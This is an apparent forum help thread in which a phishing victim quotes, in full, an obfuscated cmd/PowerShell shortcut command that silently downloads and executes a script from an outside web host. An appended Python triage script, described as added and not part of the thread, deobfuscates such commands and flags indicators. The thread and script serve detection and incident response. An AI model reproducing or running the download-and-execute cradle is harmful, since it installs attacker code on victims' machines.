Question

I believe a script has run on my pc from a downloaded link

May 18, 2017 7:57AM PDT

This looked legitimate and like a text file. Email had my name, address, phone number etc. about an order I'd placed. It's the first one I've fallen for but looked genuine.


My virus scanners aren't showing anything but I'm obviously concerned this is a virus / Trojan.

It is a notepad link, but the command line for the link is the concern.

"C:\Windows\System32\cmd.exe /c "set bpo=pow&& set nul=ershell&& cmd /c %bpo%%nul% -w HidDen -eP bypass -c IEX ((NEw-OBjE`ct ('nE'+'T.W'+'ebc'+'lienT')).('dOWnlo'+'AdstRinG').InVoKe(('htt'+'ps:/'+'/bytc'+'ard.c'+'om/crafi'+'lg/bloom')));"

which when you remove the '+' and make it all the same case is a hidden cmd script.

Anyone able to shed any light on what this is / has done / how I can remove it?

Answer
What did you download?
May 18, 2017 8:18AM PDT
It was a link attached to an email
May 18, 2017 8:34AM PDT

Apologies for the detail, I don't know what else to tell you?

The file was attached to an email, the file was empty but on closer inspection the script is the command line
http://i20.photobucket.com/albums/b207/wh00sher/12017/con2.jpg

I'm concerned that has now downloaded and run something on my computer but don't know what to check.

Since it was an email from
May 18, 2017 9:13AM PDT

Someone, ask them to explain what they are doing. What I have so far doesn't tell me enough.

In spite of that I can offer ideas such as scanning with Grif's help (see link above), removing the download item and email them to tell them what you want to say about this.

Answer
leave it alone
May 18, 2017 7:14PM PDT

If you still can't figure out what it is, just leave it alone and do not open the link. Leaks of ordering information are not new any more. Related data can be acquired in various illegal ways. A friend of mine even lost $4000 in an email fraud. But the situation is quite different. Anyway, you'd better not open the link when it's not proved safe.

already opened
May 19, 2017 2:03AM PDT

The attachment has already been opened, hence me posting this thread. Sad

The issue is, I don't know what "C:\Windows\System32\cmd.exe /c set bpo=pow&& set nul=ershell&& cmd /c %bpo%%nul% -w hidden -ep bypass -c iex ((new-obje`ct ('net.webclient')).('downloadstring').Invoke(('https://bytcard.com/crafilg/bloom'))); has done and that's what I'm asking.

My issue isn't removing the link, that was just a case of deleting the email. I've run numerous scanners to try and find anything but none pick anything up. It's the first time I've seen this type of script as a command link to an attached link and possibly why the virus scanners didn't pick it up. The email arrived seconds after placing an online order at a well-known retailer which is why I thought it was genuine, just a case of bad timing. The email from the seller arrived a minute later.
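
The clean-up the original poster describes (joining the '+' pieces and ignoring case), as an added example that is not part of the thread: a small triage script that also expands the cmd.exe `set` variables and strips the PowerShell backtick, then flags what the resulting command line does. The function names, the indicator list and the sample (a constructed string in the same shape as the quoted shortcut target, with a placeholder host) are assumptions made for illustration.

```python
import re

# Constructed sample in the same shape as the shortcut target quoted in the
# thread; example.invalid is a placeholder host, not the one from the post.
SAMPLE = (
    r'C:\Windows\System32\cmd.exe /c "set bpo=pow&& set nul=ershell&& '
    r"cmd /c %bpo%%nul% -w HidDen -eP bypass -c IEX ((NEw-OBjE`ct "
    r"('nE'+'T.W'+'ebc'+'lienT')).('dOWnlo'+'AdstRinG').InVoKe("
    r"('htt'+'ps:/'+'/exam'+'ple.inv'+'alid/a/b')));"
    '"'
)

# Illustrative indicator list (an assumption, not a complete rule set).
INDICATORS = {
    "hidden_window": r"-w[a-z]*\s+hidden",
    "execution_policy_bypass": r"-e[a-z]*\s+bypass",
    "invoke_expression": r"\biex\b|invoke-expression",
    "web_download": r"net\.webclient|downloadstring|downloadfile",
}

def normalize(cmdline):
    """Undo the three obfuscation layers seen in the thread, keeping case."""
    text = cmdline
    # cmd.exe layer: collect `set name=value` pairs, then expand %name%.
    for name, value in re.findall(r"\bset\s+(\w+)=([^&\"]*)", text, flags=re.I):
        text = re.sub("%" + re.escape(name) + "%",
                      lambda m, v=value: v, text, flags=re.I)
    # PowerShell layer: 'a'+'b' string concatenation becomes 'ab'.
    text = re.sub(r"'\s*\+\s*'", "", text)
    # A backtick before an ordinary letter is a no-op escape; dropping every
    # backtick is a simplification that is good enough for triage.
    return text.replace("`", "")

def triage(cmdline):
    """Return the cleaned command line, matched indicators and any URLs."""
    clean = normalize(cmdline)
    # Match case-insensitively instead of lower-casing the text, so the
    # case-sensitive path of a URL is preserved for blocking and log searches.
    hits = sorted(n for n, p in INDICATORS.items() if re.search(p, clean, re.I))
    urls = re.findall(r"https?://[^\s'\")]+", clean, flags=re.I)
    return {"normalized": clean, "indicators": hits, "urls": urls}

if __name__ == "__main__":
    report = triage(SAMPLE)
    print(report["normalized"])
    print(report["indicators"], report["urls"])
```

The extracted URL is what to look for in proxy, DNS or firewall logs to see whether the download actually happened; the script itself never contacts it.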